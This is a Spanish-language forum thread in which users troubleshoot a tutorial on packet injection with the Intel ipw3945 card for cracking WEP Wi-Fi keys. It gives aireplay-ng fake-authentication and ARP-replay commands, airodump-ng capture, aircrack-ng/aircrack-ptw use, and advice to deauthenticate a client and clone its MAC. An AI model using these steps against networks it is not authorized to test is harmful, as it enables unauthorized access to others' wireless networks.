Publicado por: hadrianweb en 27-11-2007, 13:47 (Martes)
Pues realiza el ataque a1 + a3
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 12-12-2007, 00:16 (Miércoles)
quizas la lejania, quizas el router, existen muchos factores, simplemente, intentalo muchas veces, y no desistas, ay que es posible que sea por la mac, asi que si tienes cliente, le haces desautentificacion, y le cojes su mac y te asocias con ella ;D ;D ;D
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 19-12-2007, 22:43 (Miércoles)
ye te digo el mejor es eso
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: Wasser en 24-12-2007, 18:34 (Lunes)
Gente, cuando le doy el ifconfig y me muestra las informaciones de wifi0, me da una direccion mac de mas de 10 pares de letras y numeros, cuando uso el aireplay, solo agarro los primeros 6, pero no es raro que ocurra eso?

No se si ayuda, pero cuando hago todo el proceso, usando esa mac, consigo recibir los paquetes arp, muy lentamente, 2 horas y consegui solo 2 paquetes... Igual de los otros agarra bastante rapido a mi parecer.

Gracias.
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 24-12-2007, 21:06 (Lunes)
Si utilizas el airoway, ya sabras cual es tu mac y punto
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: IPW3495 en 13-01-2008, 21:51 (Domingo)
estoy echo un lio   bueno   saludos  pprimero  , estoy copiando el ipw3945 i le pego en root  cuando  ejecuto un terminal nuevo ( el 3 buton de abajo) tecleo chmod 777 ipw3945 dice no such file or direcory   y luego tecleo ./ipw3945.sh me pone permision denied  gracias  q hago?
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: josef en 17-01-2008, 01:43 (Jueves)
Citar
Video inyeccion ipw3945

Espero que os ayude, y que os guste

Con formato de la web:

http://www.seguridadwireless.net/ipw3945.htm

Sin formato de la web: a fondo completo:

http://www.seguridadwireless.net/ipw3945full.htm

alojado ya en:

http://www./public/wifiway/videos/hadrianweb_ipw3945.swf

Reducido de 56 MB a 5 mb:

http://rapidshare.com/files/84389674/hadrianweb_ipw3945.rar

Saludos...
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 17-01-2008, 02:50 (Jueves)
jeje, gracias por todo  ;D ;D
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: juanpeich en 09-02-2008, 20:02 (Sábado)
wenas,

una preguntita, cual es esa canción?, eske me encanta

un saludo, JuAnPeIcH   ::)
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 09-02-2008, 20:04 (Sábado)
jeje, ya ni me acuerdo de la cancion que le puse, tendria que volver a escucharla para saber cual es, pero en estos momentos no puedo :D
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: juanpeich en 09-02-2008, 21:28 (Sábado)
okis, pus cuando puedas,

Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 20-02-2008, 13:45 (Miércoles)
Post principal modificado, imagenes cambiadas
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: H3rN4n en 26-02-2008, 20:59 (Martes)
Hola, muchas gracias por toda la información, tutoriales... que tenéis por aquí. Llevo una semana leyendo y leyendo y parece que ahora ya veo la luz.
Pero me he quedado atascado porque hago el ataque desde el live reducido (a1 + a3) y tengo ya 70.000 ARPs y no se hacer funcionar el Aircrack.
Pruebo con aircrack-ng nombre.cap    (el nombre es replay_arp-0226-172007.cap aunque no creo que sea relevante) y me responde:
1 "mac"  WEP (8 IVs)
Choosing first network as target.

Not enough IVs aviable. You need about 250.000 IVs to crack
40-bit WEP, and more than 800.000 IVs to crack a 104-bit key.


Tambien pruebo con:
aircrack-ptw nombre.cap
Y responde:
This is aircrack-ptw 1.0.0
For more informations see http://www.cdc.informatic.tu-darmtadt.de/aircrack-ptw
allocatinc a new table
bssid = "mac" key index=0
stats for bssid "mac" keyindex=0 packets=8
Creía que hacían falta menos ARPs. Además tengo el router a 3 metros y ha tardado mucho en conseguir tantas.

Muchas gracias.
Talugo.
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 26-02-2008, 21:53 (Martes)
el problema es que el archivo no es este replay_arp-0226-172007.cap el archivo que necesitas es el que capturas con el airodump-ng y no con el aireplay-ng, es decir cuando capturas con airodump-ng le pones la opcion "-w loquesea" ese loquesea sera el nombre del archivo para ejecutar con "aircrack-ng -z loquesea-01.cap"
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: H3rN4n en 26-02-2008, 22:48 (Martes)
Hola, muchas gracias por darme la solución. El problema que me surge ahora es que yo ejecuto el airodump de la siguiente forma airodump-ng rtap0. Igual que se pone en el tutorial y no tengo ni idea de donde se guarda el cap.
En /root/swireless/capturas/ tengo 4 archivos y 2 son captura-01.cap y captura-02.cap pero cuando uso el aircrack-ng solo me da 36 y 9 IVs.
Además en la raiz hay los otros que empiezan por replay-arp y replay-src.
Ya son 100000 paquetes :/

Gracias de nuevo.
Talugo.

**edito**
Hola, he puesto de nuevo el airodump con -w nombre.cap y ya ha empezado a coger IVs.
El problema es que ahora se ha quedado pillado en 26849 y el archivo ocupa 6MB justas aunque sigue cogiendo datas.
Voy a pararlo todo y a dejarlo esta noche cogiendo por si furula.

Talugo.
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: hadrianweb en 27-02-2008, 14:14 (Miércoles)
con 50000 datas deberia ser suficientes eso si si utilizas el ptw
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: kaxalot en 30-03-2008, 05:28 (Domingo)
Hola buenas a todos, tengo un par de dudas a ver si podeis decirme algo al respecto, me he releido un poco antes de escribir, me he dado cuenta de unas cosas pero empiezo desde el principio.

Yo inicio el procedo de acuerdo con el manualde la siguiente forma:
Los pasos anteriores a estos también los hago pero no quiero ponerlo todo.
Paso 1
airodump-ng rtap0
Con esto comprobamos cual es el canal de ap a atacar y también el bssid.

Paso 2
Luego abrimos otra terminal y con el aireplay-ng hacemos de la siguiente forma:
aireplay-ng -1 0 -e Nombre_del_ap -a mac_del_ap -h mi_mac wifi0
En este paso me paso me dice lo siguiente:
Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver hasn't been patched for injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * Injection is not supported AT ALL on HermesI,
      Centrino, ndiswrapper and a few others chipsets.
    * You're too far from the AP. Get closer, or lower
      the transmit rate (iwconfig <iface> rate 1M).

Paso 3
Y en otra terminal distinta hacemos lo siguiente:
aireplay-ng -3 -b mac_del_ap -h mi_mac wifi0
Aquí me coge ARP a buen ritmo y llego a tener unos 3 o 4000 todo correcto, ¿no?
Para finalizar en una terminal abrimos el airodump-ng de la siguinte forma:
airodump-ng rtap0 Esto no se para que hay que hacerlo pero lo hago y lo dejo abierto en una nueva terminal

Paso 4
Con esto lo que nos queda es esprar a que el aireplay-ng coja el arp. Para finalizar lo que tenemos que hacer es:
aircrack-ptw archivo.cap
A mi me pasa como a H3rN4n y veo que le han contestado una solución abajo, intentare a hacerlo con esa solución
This is aircrack-ptw 1.0.0
For more informations see http://www.cdc.informatic.tu-darmtadt.de/aircrack-ptw
allocatinc a new table
bssid = "mac" key index=0
stats for bssid "mac" keyindex=0 packets=8

Mis Dudas:

Para abrir los archivo.cap hay que usar airedump -w archivo.cap que se supone que el nombre del archivo.cap esta en el directorio /root/swireless/capturas/? y se supone que esto es para que los Data y los ARP suban mas rapido?

¿se supone que tienes que tener unos 5000 datas mas o menos, ¿no?

Tengo un poco de lio, he estado mirando detenidamente el video y yo hago lo mismo solo que a mi me da el problema en el paso 2, que hago mal?
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: ChimoC en 30-03-2008, 18:47 (Domingo)
Buenas:

Este hilo ya es muy largo... por favor dudas sobre la asociación e inyección en su subforo correspondiente.

Este es un hilo de MANUALES .... las cosultas de funcionamiento en otro sitio.

Todos los post que a partir de éste pregunten cómo inyectar, cómo utilizar los archivos o cualquier cosa que se pueda preguntar en su subforo correspondiente.... será directamente BORRADO...... por favor esta es una sección de MANUALES... las consultas a su subforo correspondiente. Que en esos subforos podeis abrir cualquier hilo de preguntas.

Así tendremos un foro ordenado... ok?

Gracias  ;)

Un saludo

ChimoC
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: nosekefik en 14-09-2008, 22:47 (Domingo)
Hola!!
Este tutorial tambien sirve para ipw4965?'???
gracias!!1
Título: Re: Video + Manual: Inyeccion ipw3945
Publicado por: chinitiw en 14-09-2008, 23:11 (Domingo)
has leido el titulo del hilo ¿?¿? , parece que no , pues NO ... es para una ipw3945 ...

Saludos